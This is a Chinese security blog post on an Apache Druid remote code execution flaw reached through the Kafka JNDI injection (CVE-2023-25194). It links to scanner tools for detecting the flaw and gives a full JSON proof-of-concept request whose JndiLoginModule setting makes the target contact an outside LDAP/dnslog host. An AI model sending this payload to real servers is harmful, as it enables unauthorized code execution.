Apache Druid远程代码执行漏洞
Apache Druid远程代码执行漏洞
近期,Apache Kafka官方发布关于Apache Kafka Connect JNDI注入漏洞(CVE-2023-25194)的通告。这一漏洞需要低版本的JDK或者目标Kafka Connect系统中存在利用链,但由于该漏洞触发条件非常苛刻,几乎找不到可以利用的触发点。
发现Apache Druid正好符合Kafka CVE苛刻的利用条件,可以成功触发远程代码执行漏洞。
编写了Xray远程检测工具和本地扫描工具供大家下载使用,同时在文章中提供了排查该资产的方式。
远程检测工具:
复制链接https://stack.chaitin.com/tool/detail?id=1 前往xray - CT Stack 安全社区下载最新版本xray。
本地检测工具:
复制链接https://stack.chaitin.com/tool/detail?id=735 前往 CT Stack 安全社区下载牧云本地检测工具。
执行 ./apache_druid_rce_scanner_linux_amd64 scan 即可扫描。
https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
具体测试如下:
https://vulfocus.cn/#/dashboard
使用这个环境即可:
使用burp直接提交dnslog信息如下:
dnslog返回信息如下:
- {
- "type":"kafka",
- "spec":{
- "type":"kafka",
- "ioConfig":{
- "type":"kafka",
- "consumerProperties":{
- "bootstrap.servers":"6.6.6.6:9092",
- "sasl.mechanism":"SCRAM-SHA-256",
- "security.protocol":"SASL_SSL",
- "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://gwbvwo.dnslog.cn" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
- },
- "topic":"any",
- "useEarliestOffset":true,
- "inputFormat":{
- "type":"regex",
- "pattern":"([\s\S]*)",
- "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
- "columns":[
- "raw"
- ]
- }
- },
- "dataSchema":{
- "dataSource":"sample",
- "timestampSpec":{
- "column":"!!!_no_such_column_!!!",
- "missingValue":"1970-01-01T00:00:00Z"
- },
- "dimensionsSpec":{
-
- },
- "granularitySpec":{
- "rollup":false
- }
- },
- "tuningConfig":{
- "type":"kafka"
- }
- },
- "samplerConfig":{
- "numRows":500,
- "timeoutMs":15000
- }
- }
- https://mp.weixin.qq.com/s/cBnyUKQKPzGz0ZQwQgRjSw
0x01 阅读须知
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
THE END
0
二维码
海报
共有 0 条评论